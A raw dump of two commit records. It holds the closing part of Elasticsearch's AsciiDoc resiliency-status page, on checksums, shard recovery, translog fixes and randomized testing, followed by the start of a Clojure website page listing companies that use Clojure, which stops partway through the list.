\n\n[float]\n=== Rare compression corruption during shard recovery (STATUS: DONE, v1.3.2)\n\nDuring recovery, the primary shard is copied over the network to become a new replica shard. In rare cases, it was possible for a hash collision to trigger a bug in the compression library we use, producing corruption in the replica shard. This bug was exposed by the change to validate checksums during recovery. We tracked down the bug in the compression library and submitted a patch, which was accepted and merged by the upstream project. See {GIT}7210[#7210].\n\n[float]\n=== Safer recovery of replica shards (STATUS: DONE, v1.3.0)\n\nIf a primary shard fails or is closed while a replica is using it for recovery, we need to ensure that the replica is properly failed as well, and allow recovery to start from the new primary. Also check that an active copy of a shard is available on another node before physically removing an inactive shard from disk. {GIT}6825[#6825], {GIT}6645[#6645], {GIT}6995[#6995].\n\n[float]\n=== Using Lucene Checksums to verify shards during recovery (STATUS: DONE, v1.3.0)\n\nElasticsearch can use Lucene checksums to validate files while {GIT}6776[recovering a replica shard from a primary].\n\nThis issue exposed a bug in Elasticsearch\u2019s handling of primary shard failure when there are more than two replicas, causing the second replica to not be properly unassigned if it is in the middle of recovery. It was fixed with the merge of issue {GIT}6808[#6808].\n\nIn order to verify the checksumming mechanism, we added functionality to our testing infrastructure that can corrupt an arbitrary index file at any point, such as while it\u2019s traveling over the wire or residing on disk. The tests utilizing this feature expect full or partial recovery from the failure while neither losing data nor spreading the corruption.\n\n[float]\n=== Detect File Corruption (STATUS: DONE, v1.3.0)\n\nIf a checksum failure reveals index corruption during merging or refresh, Elasticsearch will fail the shard. You can read the full details in pull request {GIT}6776[#6776].\n\n[float]\n=== Network disconnect events could be lost, causing a zombie node to stay in the cluster state (STATUS: DONE, v1.3.0)\n\nPreviously, there was a very short window in which we could lose a node disconnect event. To prevent this from occurring, we added extra handling of connection errors to our node & master fault detection pinging to make sure the node disconnect event is detected. See issue {GIT}6686[#6686].\n\n[float]\n=== Other fixes to Lucene to address resiliency (STATUS: DONE, v1.3.0)\n\n* NativeLock is released if Lock is closed after failing on obtain {JIRA}5738[LUCENE-5738].\n* NRT Reader close can wipe an index it doesn\u2019t own. {JIRA}5574[LUCENE-5574]\n* FSDirectory\u2019s fsync() was lenient; it now throws exceptions when errors occur {JIRA}5570[LUCENE-5570]\n* fsync() directory when committing {JIRA}5588[LUCENE-5588]\n\n[float]\n=== Backwards Compatibility Testing (STATUS: DONE, v1.3.0)\n\nSince founding Elasticsearch Inc., we grew our test base from ~1k tests to about 4k in just over a year.
We invested massively into our testing infrastructure, running our tests continuously on different operating systems, bare metal hardware and cloud environments, all while randomizing JVMs and their settings.\n\nYet, backwards compatibility testing was a very manual thing until we shipped a pretty {GIT}6393[insane bug] in Elasticsearch 1.2. We tried to fix places where the absolute value of a number was negative (a documented behavior of Math.abs(int) in Java when the input is Integer.MIN_VALUE) and missed that the fix for this also changed the result of our routing function. No matter how much randomization we applied to the tests, we didn\u2019t catch this particular failure. We always had backwards compatibility tests on our list of things to do, but didn\u2019t have them in place back then.\n\nWe recently tweaked our testing infrastructure to be able to run tests against a hybrid cluster composed of a released version of Elasticsearch and our current stable branch. This test pattern allowed us to mimic typical upgrade scenarios like rolling upgrades, index backwards compatibility and recovering from old to new nodes.\n\nNow, even the simplest test that relies on routing fails against 1.2.0, which is exactly what we were aiming for. The test would not have caught the aforementioned {GIT}6393[routing bug] before releasing 1.2.0, but it immediately saved us from {GIT}6660[another problem] in the stable branch.\n\nThe work on our testing infrastructure is more than just issue prevention; it allows us to develop and test upgrade paths, introduce new features and evolve indexing over time. It isn\u2019t enough to introduce more resilient implementations; we also have to ensure that users take advantage of them when they upgrade.\n\nYou can read more about backwards compatibility tests in issue {GIT}6497[#6497].\n\n[float]\n=== Full Translog Writes on all Platforms (STATUS: DONE, v1.2.2 and v1.3.0)\n\nWe have recently received bug reports of transaction log corruption that can occur when indexing very large documents (in the area of 300 KB). Although some Linux users reported this behavior, it appears the problem occurs more frequently when running Windows. We traced the source of the problem to the fact that when serializing documents to the transaction log, the operating system can write only part of the document before returning from the write call. We can now detect this situation and make sure that the entire document is properly written. You can read the full details in pull request {GIT}6576[#6576].\n\n[float]\n=== Lucene Checksums (STATUS: DONE, v1.2.0)\n\nBefore Apache Lucene version 4.8, checksums were not computed on generated index files. The result was that it was difficult to identify when or if a Lucene index got corrupted, whether by hardware failure, JVM bug or for an entirely different reason.\n\nFor an idea of the checksum efforts in progress in Apache Lucene, see issues {JIRA}2446[LUCENE-2446], {JIRA}5580[LUCENE-5580] and {JIRA}5602[LUCENE-5602]. The gist is that Lucene 4.8+ now computes full checksums on all index files and it verifies them when opening metadata or other smaller files as well as other files during merges.\n\n[float]\n=== Detect errors faster by locally failing a shard upon an indexing error (STATUS: DONE, v1.2.0)\n\nPreviously, Elasticsearch notified the master of the shard failure and waited for the master to close the local copy of the shard, thus assigning it to other nodes.
This architecture caused delays in failure detection, potentially causing unneeded failures of other incoming requests. In rare cases, such as concurrency race conditions or certain network partition configurations, we could lose these failure notifications. We solved this issue by locally failing shards upon indexing errors. See issue {GIT}5847[#5847].\n\n[float]\n=== Snapshot\/Restore API (STATUS: DONE, v1.0.0)\n\nIn Elasticsearch version 1.0, we significantly improved the backup process by introducing the Snapshot\/Restore API. While it was always possible to make backups of Elasticsearch, the Snapshot\/Restore API made the backup process much easier.\n\nThe backup process is incremental, making it very efficient since only files changed since the last backup are copied. Even with this efficiency introduced, each snapshot contains a full picture of the cluster at the moment the backup started. The restore API allows speedy recovery of a full cluster as well as selected indices.\n\nSince that first release in version 1.0, the API has continued to evolve. In version 1.1.0, we added a new snapshot status API that allows users to monitor the snapshot process. In 1.3.0 we added the ability to {GIT}6457[restore indices without their aliases] and in 1.4 we are planning to add the ability to {GIT}6368[restore partial snapshots].\n\nThe Snapshot\/Restore API supports a number of different repository types for storing backups. Currently, it\u2019s possible to make backups to a shared file system, Amazon S3, HDFS, and Azure storage. We are continuing to work on adding other types of storage systems, as well as improving the robustness of the snapshot\/restore process.\n\n[float]\n=== Circuit Breaker: Fielddata (STATUS: DONE, v1.0.0)\n\nCurrently, the http:\/\/www.elasticsearch.org\/guide\/en\/elasticsearch\/reference\/current\/index-modules-fielddata.html[circuit breaker] protects against loading too much field data by estimating how much memory the field data will take to load, then aborting the request if the memory requirements are too high. This feature was added in Elasticsearch version 1.0.0.\n\n[float]\n=== Use of Paginated Data Structures to Ease Garbage Collection (STATUS: DONE, v1.0.0 & v1.2.0)\n\nElasticsearch has moved from an object-based cache to a page-based cache recycler as described in issue {GIT}4557[#4557]. This change makes garbage collection easier by limiting fragmentation, since all pages have the same size and are recycled. It also allows managing the size of the cache not based on the number of objects it contains, but on the memory that it uses.\n\nThese pages are used for two main purposes: implementing higher-level data structures such as hash tables, used internally by aggregations to, for example, map terms to counts, as well as reusing memory in the translog\/transport layer as detailed in issue {GIT}5691[#5691].\n\n[float]\n=== Dedicated Master Nodes Resiliency (STATUS: DONE, v1.0.0)\n\nIn order to run a more resilient cluster, we recommend running dedicated master nodes to ensure master nodes are not affected by resources consumed by data nodes. We have also made master nodes more resilient to heavy resource usage, mainly associated with large clusters \/ cluster states.\n\nThese changes include:\n\n* Improve the balancing algorithm to execute faster across large clusters \/ many indices. (See issue {GIT}4458[#4458] and {GIT}4459[#4459])\n* Improve cluster state publishing to not create an additional network buffer per node.
(More in https:\/\/github.com\/elasticsearch\/elasticsearch\/commit\/a9e259d438c3cb1d3bef757db2d2a91cf85be609[this commit].)\n* Improve master handling of large scale mapping updates from data nodes by batching them into a single cluster event. (See issue {GIT}4373[#4373].)\n* Add an ack mechanism where next phase cluster updates are processed only when nodes acknowledged they received the previous cluster state. (See issues {GIT}3736[#3736], {GIT}3786[#3786], {GIT}4114[#4114], {GIT}4169[#4169], {GIT}4228[#4228] and {GIT}4421[#4421], which also include enhancements to the ack mechanism implementation.)\n\n[float]\n=== Multi Data Paths May Falsely Report Corrupt Index (STATUS: DONE, v1.0.0)\n\nWhen using multiple data paths, an index could be falsely reported as corrupted. This has been fixed with pull request {GIT}4674[#4674].\n\n[float]\n=== Randomized Testing (STATUS: DONE, v1.0.0)\n\nIn order to best validate resiliency in Elasticsearch, we rewrote the Elasticsearch test infrastructure to introduce the concept of http:\/\/berlinbuzzwords.de\/sites\/berlinbuzzwords.de\/files\/media\/documents\/dawidweiss-randomizedtesting-pub.pdf[randomized testing]. Randomized testing allows us to easily enhance the Elasticsearch testing infrastructure with predictably irrational conditions, making the resulting code base more resilient.\n\nEach of our integration tests runs against a cluster with a random number of nodes, and indices have a random number of shards and replicas. Merge settings change for every run; indexing is done serially or asynchronously, or even wrapped in a bulk operation; and thread pool sizes vary to ensure that we don\u2019t produce a deadlock no matter what happens. The list of places where we use this randomization infrastructure is long and growing every day, and it has saved us headaches several times before we shipped a particular feature.\n\nAt Elasticsearch, we live the philosophy that we can miss a bug once, but never a second time. We make our tests more evil as we go, introducing randomness in all the areas where we discovered bugs. We figure if our tests don\u2019t fail, we are not trying hard enough! If you are interested in how we have evolved our test infrastructure over time, check out https:\/\/github.com\/elasticsearch\/elasticsearch\/issues?q=label%3Atest[issues labeled with ``test'' on GitHub].\n\n[float]\n=== Lucene Loses Data On File Descriptors Failure (STATUS: DONE, v0.90.0)\n\nWhen a process runs out of file descriptors, Lucene can cause an index to be completely deleted. This issue was fixed in Lucene ({JIRA}4870[version 4.2.1]) and the fix was included in an early version of Elasticsearch. See issue {GIT}2812[#2812].\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7369ab00932bb036c43f053367391009429dc650","subject":"add company","message":"add company\n","repos":"clojure\/clojure-site","old_file":"content\/community\/companies.adoc","new_file":"content\/community\/companies.adoc","new_contents":"= Companies\nAlex Miller\n2017-03-15\n:type: community\n:toc: macro\n:icons: font\n\nBelow is a partial list of some companies using Clojure or ClojureScript. Most of this information comes from direct contacts, presentations, or other online resources.
If you would like to be added or removed from this list, please contact __clojure@cognitect.com__ or submit a pull request to the https:\/\/github.com\/clojure\/clojure-site[site repository].\n\nAlso, check out the <<success_stories#,Clojure Success Stories>> and <<community_stories#,Community Stories>> pages!\n\n* https:\/\/1st1.dev\/[1st1.dev,opts=nofollow]\n* http:\/\/8thlight.com\/[8th Light,opts=nofollow]\n* http:\/\/www.aclaimant.com\/[aclaimant,opts=nofollow]\n* https:\/\/www.active-group.de\/[Active Group GmbH,opts=nofollow]\n* http:\/\/www.adaptly.com\/[Adaptly,opts=nofollow]\n* http:\/\/www.adgoji.com\/[AdGoji,opts=nofollow]\n* https:\/\/www.adobe.com[Adobe,opts=nofollow]\n* https:\/\/www.adstage.io\/[AdStage,opts=nofollow]\n* http:\/\/www.advanceautoparts.com\/[Advance Auto Parts,opts=nofollow]\n* http:\/\/adzerk.com\/[Adzerk,opts=nofollow]\n* http:\/\/www.againtelligent.com\/en\/[AGA,opts=nofollow]\n* https:\/\/www.onthemarket.com[AgentsMutual\/OnTheMarket,opts=nofollow]\n* http:\/\/www.airloyal.com[Airloyal,opts=nofollow]\n* https:\/\/www.ajira.tech\/[Ajira,opts=nofollow]\n* https:\/\/www.akamai.com\/[Akamai,opts=nofollow]\n* https:\/\/akvo.org[Akvo Foundation,opts=nofollow]\n* http:\/\/www.amazon.com[Amazon,opts=nofollow]\n* https:\/\/amperity.com\/[Amperity,opts=nofollow]\n* https:\/\/www.animalia.no\/[Animalia,opts=nofollow]\n* http:\/\/annadaletech.com\/[Annadale Technologies,opts=nofollow]\n* http:\/\/www.answers.com[Answers.com,opts=nofollow]\n* http:\/\/www.anywhere.com\/[Anywhere.com,opts=nofollow]\n* https:\/\/www.apexdatasolutions.net\/[Apex Data Solutions,opts=nofollow]\n* https:\/\/apple.com[Apple,opts=nofollow]\n* http:\/\/www.appsflyer.com\/[AppsFlyer,opts=nofollow]\n* http:\/\/www.appsmiths.com\/where.php[AppSmiths,opts=nofollow]\n* http:\/\/www.appsnsites.com\/[Appsnsites,opts=nofollow]\n* http:\/\/arcstudiopro.com\/[Arc Studio Pro,opts=nofollow]\n* http:\/\/ardoq.com\/[Ardoq,opts=nofollow]\n* https:\/\/atomist.com[Atomist,opts=nofollow]\n* https:\/\/attendify.com\/[Attendify,opts=nofollow]\n* https:\/\/audiencerepublic.com[Audience Republic,opts=nofollow]\n* http:\/\/auspost.com.au\/[Australia Post,opts=nofollow]\n* http:\/\/www.autheos.com\/[Autheos,opts=nofollow]\n* https:\/\/www.bandsquare.com\/[BandSquare,opts=nofollow]\n* https:\/\/teachbanzai.com\/[Banzai,opts=nofollow]\n* http:\/\/www.baresquare.com\/[baresquare,opts=nofollow]\n* https:\/\/www.barracuda.com\/[Barracuda,opts=nofollow]\n* https:\/\/www.basefex.com\/[BaseFEX,opts=nofollow]\n* http:\/\/beanstalkapp.com\/[Beanstalk,opts=nofollow]\n* http:\/\/BearyInnovative.com[Beary Innovative,opts=nofollow]\n* https:\/\/www.beopinion.com\/[BeOpinion,opts=nofollow]\n* http:\/\/bevuta.com\/[bevuta,opts=nofollow]\n* https:\/\/www.bgpworks.com[BGPworks,opts=nofollow]\n* https:\/\/billfront.com\/[BillFront,opts=nofollow]\n* https:\/\/www.bimsystems.de\/[BIMwelt Systems,opts=nofollow]\n* https:\/\/bloomventures.io[Bloom,opts=nofollow]\n* https:\/\/www.bookwell.com.au\/[BookWell,opts=nofollow]\n* https:\/\/boundlessgeo.com\/[Boundless Geo,opts=nofollow]\n* https:\/\/brainsfeed.com[Brainsfeed,opts=nofollow]\n* https:\/\/www.braintreepayments.com\/[Braintree Payments (acquired by PayPal),opts=nofollow]\n* http:\/\/www.breezeehr.com\/[Breeze EHR,opts=nofollow]\n* http:\/\/brickalloy.com\/[BrickAlloy,opts=nofollow]\n* https:\/\/www.brightin.nl\/[Brightin,opts=nofollow]\n* https:\/\/www.broadbandspeedtest.org.uk\/[BroadbandUK,opts=nofollow]\n* http:\/\/broadpeakpartners.com[BroadPeak,opts=nofollow]\n* 
https:\/\/buddy.works\/[Buddy,opts=nofollow]\n* http:\/\/bugsbio.org\/[BUGS Bioscience,opts=nofollow]\n* http:\/\/buyhappy.co\/[Buy Happy,opts=nofollow]\n* https:\/\/buzzlers.com[buzzlers.com,opts=nofollow]\n* https:\/\/www.cambioscience.com[CambioScience,opts=nofollow]\n* http:\/\/cambium.consulting\/[Cambium Consulting,opts=nofollow]\n* https:\/\/www.capitalone.com\/[Capital One,opts=nofollow]\n* https:\/\/cardforcoin.com\/[cardforcoin,opts=nofollow]\n* https:\/\/carouselapps.com\/[Carousel Apps,opts=nofollow]\n* https:\/\/www.cars.co.za\/[Cars.co.za,opts=nofollow]\n* http:\/\/carwow.co.uk\/[carwow,opts=nofollow]\n* http:\/\/www.ca.com\/[CA Technologies,opts=nofollow]\n* http:\/\/www.cellusys.com[Cellusys,opts=nofollow]\n* https:\/\/mycentriq.com\/[Centriq,opts=nofollow]\n* http:\/\/www.cenx.com\/[CENX,opts=nofollow]\n* http:\/\/www.cerner.com\/[Cerner,opts=nofollow]\n* https:\/\/cervest.earth[Cervest Ltd.,opts=nofollow]\n* http:\/\/www.consumerfinance.gov\/[CFPB (Credit Financial Protection Bureau),opts=nofollow]\n* http:\/\/chariotsolutions.com\/[Chariot Solutions,opts=nofollow]\n* http:\/\/chartbeat.com[Chartbeat,opts=nofollow]\n* http:\/\/www.cicayda.com\/[Cicayda,opts=nofollow]\n* https:\/\/circleci.com\/[CircleCI,opts=nofollow]\n* https:\/\/www.cisco.com[Cisco,opts=nofollow]\n* http:\/\/www.citi.com[Citi,opts=nofollow]\n* http:\/\/clanhr.com\/en[ClanHR,opts=nofollow]\n* https:\/\/clearcoin.co[ClearCoin,opts=nofollow]\n* http:\/\/www.climate.com\/[Climate Corp (acquired by Monsanto),opts=nofollow]\n* http:\/\/www.clockworks.io\/[Clockworks,opts=nofollow]\n* http:\/\/cloudgears.com\/[CloudGears,opts=nofollow]\n* http:\/\/www.cloudrepo.io\/[CloudRepo,opts=nofollow]\n* https:\/\/clubhouse.io\/[Clubhouse,opts=nofollow]\n* http:\/\/code54.com[Code54,opts=nofollow]\n* http:\/\/codecentric.de[codecentric,opts=nofollow]\n* http:\/\/devartcodefactory.com\/[Co(de)factory,opts=nofollow]\n* http:\/\/www.codurance.com\/[Codurance,opts=nofollow]\n* https:\/\/www.cognician.com\/[Cognician,opts=nofollow]\n* http:\/\/cognitect.com[Cognitect,opts=nofollow]\n* https:\/\/collbox.co\/[CollBox,opts=nofollow]\n* http:\/\/collectivedigitalstudio.com[Collective Digital Studio,opts=nofollow]\n* http:\/\/commonwealthrobotics.com\/[Commonwealth Robotics,opts=nofollow]\n* https:\/\/commsor.com\/[Commsor,opts=nofollow]\n* http:\/\/www.condense.com.au[Condense,opts=nofollow]\n* http:\/\/www.consumerreports.org\/cro\/index.htm[Consumer Reports,opts=nofollow]\n* http:\/\/www.create.at\/[CREATE.21st century,opts=nofollow]\n* https:\/\/www.getcrossbeam.com\/[Crossbeam,opts=nofollow]\n* https:\/\/www.crossref.org\/[Crossref,opts=nofollow]\n* https:\/\/crowd.br.com\/[CROWD,opts=nofollow]\n* https:\/\/cryptowerk.com[Cryptowerk,opts=nofollow]\n* https:\/\/curbside.com[Curbside,opts=nofollow]\n* http:\/\/www.cycloid.io[Cycloid,opts=nofollow]\n* https:\/\/www.cycognito.com[CyCognito,opts=nofollow]\n* http:\/\/www.dailymail.co.uk\/[Daily Mail MailOnline,opts=nofollow]\n* https:\/\/www.databaselabs.io\/[Database Labs,opts=nofollow]\n* http:\/\/www.datacraft.sg\/[Datacraft,opts=nofollow]\n* http:\/\/www.datasnap.io\/[DataSnap.io,opts=nofollow]\n* http:\/\/www.datomic.com\/[Datomic,opts=nofollow]\n* https:\/\/www.d-n.be\/[Debreuck Neirynck (DN),opts=nofollow]\n* https:\/\/www.deep-impact.ch[Deep Impact,opts=nofollow]\n* http:\/\/degree9.io\/[Degree9,opts=nofollow]\n* http:\/\/democracy.works\/[Democracy Works,opts=nofollow]\n* https:\/\/www.deps.co[Deps,opts=nofollow]\n* http:\/\/www.designed.ly\/[Designedly,opts=nofollow]\n* 
https:\/\/www.db.com[Deutsche Bank,opts=nofollow]\n* https:\/\/www.devatics.com\/[Devatics,opts=nofollow]\n* http:\/\/dewise.com[Dewise,opts=nofollow]\n* https:\/\/www.diagnosia.com\/[Diagnosia,opts=nofollow]\n* https:\/\/www.discendum.com[Discendum ltd,opts=nofollow]\n* https:\/\/www.dividendfinance.com[Dividend Finance,opts=nofollow]\n* https:\/\/www.docsolver.com[DocSolver,opts=nofollow]\n* https:\/\/drevidence.com\/[Doctor Evidence,opts=nofollow]\n* https:\/\/www.doctronic.de[Doctronic,opts=nofollow]\n* http:\/\/dov-e.com[DOV-E,opts=nofollow]\n* http:\/\/dploy.io\/[dploy.io,opts=nofollow]\n* https:\/\/dreamtolearn.com[Dream to Learn,opts=nofollow]\n* http:\/\/drwtrading.com[DRW Trading Group,opts=nofollow]\n* https:\/\/www.dyne.org[Dyne.org,opts=nofollow]\n* http:\/\/www.ebay.com\/[eBay,opts=nofollow]\n* http:\/\/element84.com[Element 84,opts=nofollow]\n* http:\/\/www.empear.com\/[Empear,opts=nofollow]\n* https:\/\/writeandimprove.com\/[English Language iTutoring,opts=nofollow]\n* http:\/\/enterlab.dk[Enterlab,opts=nofollow]\n* https:\/\/www.joinef.com[Entrepreneur First,opts=nofollow]\n* http:\/\/eventfabric.com\/[Event Fabric,opts=nofollow]\n* https:\/\/eventum.no[Eventum,opts=nofollow]\n* https:\/\/evolta.fi\/[Evolta,opts=nofollow]\n* https:\/\/exoscale.ch\/[Exoscale,opts=nofollow]\n* https:\/\/www.eyeota.com\/[Eyeota,opts=nofollow]\n* http:\/\/facebook.com[Facebook,opts=nofollow]\n* http:\/\/www.facjure.com\/[Facjure,opts=nofollow]\n* http:\/\/www.factual.com\/[Factual,opts=nofollow]\n* http:\/\/www.farbetter.com\/[FarBetter,opts=nofollow]\n* https:\/\/fierce.ventures[Fierce.,opts=nofollow]\n* http:\/\/www.finalist.nl\/[Finalist,opts=nofollow]\n* https:\/\/paper.li\/[Finity AI,opts=nofollow]\n* http:\/\/www.flexiana.com\/[Flexiana,opts=nofollow]\n* http:\/\/flocktory.com[Flocktory,opts=nofollow]\n* http:\/\/www.flowa.fi\/[Flowa,opts=nofollow]\n* http:\/\/www.formcept.com\/[FORMCEPT,opts=nofollow]\n* http:\/\/try.framed.io\/[Framed Data,opts=nofollow]\n* https:\/\/freshcodeit.com\/[Freshcode,opts=nofollow]\n* https:\/\/www.fullcontact.com\/[FullContact,opts=nofollow]\n* http:\/\/functionalworks.com\/[Functional Works,opts=nofollow]\n* http:\/\/fundingcircle.com[Funding Circle,opts=nofollow]\n* http:\/\/futurice.com\/[Futurice,opts=nofollow]\n* http:\/\/www.getcontented.com.au\/[GetContented,opts=nofollow]\n* http:\/\/about.getset.com\/[GetSet,opts=nofollow]\n* http:\/\/www.gocatch.com\/[GoCatch,opts=nofollow]\n* https:\/\/gofore.com\/en\/home\/[Gofore,opts=nofollow]\n* https:\/\/www.goizper.com\/[Goizper Group,opts=nofollow]\n* https:\/\/www.go-jek.com[GO-JEK,opts=nofollow]\n* https:\/\/goldfynch.com\/[GoldFynch,opts=nofollow]\n* https:\/\/goodhertz.co\/[Goodhertz,opts=nofollow]\n* http:\/\/www.goopti.com\/[GoOpti,opts=nofollow]\n* http:\/\/www.gracenote.com\/[Gracenote,opts=nofollow]\n* https:\/\/www.grammarly.com\/[Grammarly,opts=nofollow]\n* http:\/\/www.greenpowermonitor.com\/[GreenPowerMonitor,opts=nofollow]\n* http:\/\/www.groupon.com[Groupon,opts=nofollow]\n* https:\/\/guaranteedrate.com[Guaranteed Rate,opts=nofollow]\n* https:\/\/handcheque.com\/[handcheque,opts=nofollow]\n* https:\/\/www.happymoney.com[HappyMoney,opts=nofollow]\n* https:\/\/hashrocket.com\/[Hashrocket,opts=nofollow]\n* http:\/\/www.healthfinch.com\/[healthfinch,opts=nofollow]\n* https:\/\/www.health-samurai.io[HealthSamurai,opts=nofollow]\n* https:\/\/www.helpshift.com\/[Helpshift,opts=nofollow]\n* http:\/\/www.hendrickauto.com\/[Hendrick Automotive Group,opts=nofollow]\n* 
https:\/\/www.heromarketing.nl\/[Hero Marketing,opts=nofollow]\n* http:\/\/www.heroku.com[Heroku,opts=nofollow]\n* https:\/\/hexawise.com\/[Hexawise,opts=nofollow]\n* https:\/\/homescreen.is\/[#Homescreen,opts=nofollow]\n* https:\/\/www.huobi.com\/[Huobi Global,opts=nofollow]\n* http:\/\/www.ib5k.com\/[IB5k,opts=nofollow]\n* https:\/\/icm-consulting.com.au\/[ICM Consulting,opts=nofollow]\n* http:\/\/labs.ig.com\/[IG,opts=nofollow]\n* https:\/\/www.imatic.cz[Imatic,opts=nofollow]\n* https:\/\/immute.co\/[Immute,opts=nofollow]\n* https:\/\/indabamusic.com[Indaba Music,opts=nofollow]\n* http:\/\/innoq.com[InnoQ,opts=nofollow]\n* https:\/\/instadeq.com\/[instadeq,opts=nofollow]\n* http:\/\/www.intentmedia.com\/[Intent Media,opts=nofollow]\n* http:\/\/www.interware.com.mx\/[InterWare,opts=nofollow]\n* http:\/\/www.intropica.com\/[Intropica,opts=nofollow]\n* http:\/\/www.intuit.com[Intuit,opts=nofollow]\n* http:\/\/www.iplantcollaborative.org\/[iPlant Collaborative,opts=nofollow]\n* https:\/\/www.iprally.com[IPRally Technologies,opts=nofollow]\n* http:\/\/iris.tv\/[IRIS.TV,opts=nofollow]\n* https:\/\/www.jcrew.com\/[J.Crew,opts=nofollow]\n* https:\/\/jesi.io[JESI,opts=nofollow]\n* http:\/\/juxt.pro[JUXT,opts=nofollow]\n* http:\/\/www.kane-group.com\/[Kane LPI,opts=nofollow]\n* https:\/\/kasta.ua[Kasta,opts=nofollow]\n* https:\/\/kirasystems.com\/[Kira,opts=nofollow]\n* https:\/\/klarna.com[Klarna,opts=nofollow]\n* http:\/\/knowledgee.com\/[Knowledge E,opts=nofollow]\n* http:\/\/www.kodemaker.no\/[Kodemaker,opts=nofollow]\n* https:\/\/kwelia.com\/[Kwelia,opts=nofollow]\n* https:\/\/www.ladderlife.com[Ladder,opts=nofollow]\n* https:\/\/www.theladders.com\/[Ladders,opts=nofollow]\n* https:\/\/lambdawerk.com\/[LambdaWerk,opts=nofollow]\n* https:\/\/www.latacora.com\/[Latacora,opts=nofollow]\n* http:\/\/leancloud.cn[Leancloud.cn,opts=nofollow]\n* http:\/\/en.leanheat.com[Leanheat,opts=nofollow]\n* https:\/\/lemmings.io[Lemmings,opts=nofollow]\n* https:\/\/www.lemonpi.io\/[LemonPI,opts=nofollow]\n* https:\/\/www.lendup.com\/[LendUp,opts=nofollow]\n* http:\/\/levelmoney.com[Level Money,opts=nofollow]\n* http:\/\/www.lifebooker.com[Lifebooker,opts=nofollow]\n* http:\/\/liftoff.io\/[Liftoff,opts=nofollow]\n* http:\/\/lightmesh.com[LightMesh,opts=nofollow]\n* http:\/\/likely.co\/[Likely,opts=nofollow]\n* https:\/\/line.me\/[LINE,opts=nofollow]\n* https:\/\/fluent.express[LinguaTrip,opts=nofollow]\n* http:\/\/linkfluence.com[Linkfluence,opts=nofollow]\n* http:\/\/www.listora.com\/[Listora,opts=nofollow]\n* http:\/\/www.liveops.com\/[LiveOps,opts=nofollow]\n* https:\/\/www.livingsocial.com\/[LivingSocial,opts=nofollow]\n* https:\/\/www.localize.city\/[Localize.city,opts=nofollow]\n* https:\/\/locarise.com\/[Locarise,opts=nofollow]\n* http:\/\/logicsoft.co.in\/[Logic Soft Pvt. 
Ltd.,opts=nofollow]\n* http:\/\/lonocloud.com\/[LonoCloud (acquired by ViaSat),opts=nofollow]\n* https:\/\/www.lookingglasscyber.com\/[LookingGlass Cyber Solutions,opts=nofollow]\n* https:\/\/www.loway.ch\/[Loway,opts=nofollow]\n* https:\/\/lucidit.consulting[Lucid IT Consulting LLC,opts=nofollow]\n* http:\/\/www.lumanu.com\/[Lumanu,opts=nofollow]\n* https:\/\/www.lunchboxsessions.com[LunchBox Sessions,opts=nofollow]\n* https:\/\/www.macrofex.com\/[Macrofex,opts=nofollow]\n* http:\/\/www.macrofex.com[MACROFEX LLC,opts=nofollow]\n* http:\/\/www.madriska.com\/[Madriska Inc.,opts=nofollow]\n* http:\/\/www.magnet.coop\/[Magnet,opts=nofollow]\n* http:\/\/mainstreetgenome.com\/[Main Street Genome,opts=nofollow]\n* https:\/\/www.makimo.pl\/[Makimo, opts=nofollow]\n* http:\/\/www.comidadagente.org\/[Marktbauer\/Comida da gente,opts=nofollow]\n* http:\/\/www.mastodonc.com\/[Mastodon C,opts=nofollow]\n* http:\/\/mayvenn.com[Mayvenn,opts=nofollow]\n* https:\/\/mazira.com\/[Mazira,opts=nofollow]\n* http:\/\/www.mediquest.nl\/[Mediquest,opts=nofollow]\n* http:\/\/meewee.com[MeeWee,opts=nofollow]\n* https:\/\/www.merantix.com\/[Merantix,opts=nofollow]\n* http:\/\/www.metabase.com\/[Metabase,opts=nofollow]\n* http:\/\/www.metail.com[Metail,opts=nofollow]\n* http:\/\/metosin.fi\/[Metosin,opts=nofollow]\n* http:\/\/minorodata.com\/[Minoro,opts=nofollow]\n* https:\/\/mixpanel.com\/[Mixpanel,opts=nofollow]\n* http:\/\/www.mixrad.io\/[MixRadio,opts=nofollow]\n* http:\/\/www.modelogiq.com\/[modelogiq,opts=nofollow]\n* http:\/\/www.molequedeideias.net\/[Moleque de Ideias,opts=nofollow]\n* https:\/\/www.motiva.ai\/[Motiva AI,opts=nofollow]\n* http:\/\/multis.co\/[Multis,opts=nofollow]\n* http:\/\/www.mysema.com\/[Mysema,opts=nofollow]\n* http:\/\/nemCV.com[nemCV.com,opts=nofollow]\n* https:\/\/www.netflix.com[Netflix,opts=nofollow]\n* https:\/\/www.neustar.biz\/[Neustar,opts=nofollow]\n* http:\/\/nexonit.com[nexonit.com,opts=nofollow]\n* http:\/\/www.nextangles.com[NextAngles,opts=nofollow]\n* https:\/\/nextjournal.com\/[Nextjournal,opts=nofollow]\n* http:\/\/nilenso.com\/[nilenso,opts=nofollow]\n* https:\/\/www.nitor.com[Nitor,opts=nofollow]\n* https:\/\/nederlandsegokkasten.com\/[NLG,opts=nofollow]\n* https:\/\/nomnominsights.com[NomNom Insights,opts=nofollow]\n* https:\/\/www.norled.no\/[Norled,opts=nofollow]\n* http:\/\/lamuz.uz[NowMedia Tech,opts=nofollow]\n* https:\/\/nsd.no[NSD - Norwegian Centre for Research Data,opts=nofollow]\n* https:\/\/www.nubank.com.br\/[Nubank,opts=nofollow]\n* https:\/\/nukomeet.com\/[Nukomeet,opts=nofollow]\n* http:\/\/numerical.co.nz\/[Numerical Brass Computing,opts=nofollow]\n* https:\/\/www.ochedart.com\/[Oche Dart,opts=nofollow]\n* https:\/\/oiiku.com[Oiiku,opts=nofollow]\n* https:\/\/okletsplay.com\/[OkLetsPlay,opts=nofollow]\n* http:\/\/www.omnyway.com\/[Omnyway Inc,opts=nofollow]\n* https:\/\/ona.io[Ona,opts=nofollow]\n* https:\/\/onfido.com\/gb\/[Onfido,opts=nofollow]\n* https:\/\/onlinecasinoinformatie.com\/[OnlineCasinoInformatie,opts=nofollow]\n* http:\/\/www.onthemarket.com\/[OnTheMarket,opts=nofollow]\n* https:\/\/opencompany.com\/[OpenCompany,opts=nofollow]\n* http:\/\/OpenSensors.io[OpenSensors.io,opts=nofollow]\n* http:\/\/www.opentable.com\/[OpenTable,opts=nofollow]\n* http:\/\/www.oracle.com[Oracle,opts=nofollow]\n* http:\/\/www.orgsync.com\/[OrgSync,opts=nofollow]\n* https:\/\/www.orkli.com\/en[Orkli,opts=nofollow]\n* https:\/\/www.oscaro.com\/[Oscaro,opts=nofollow]\n* 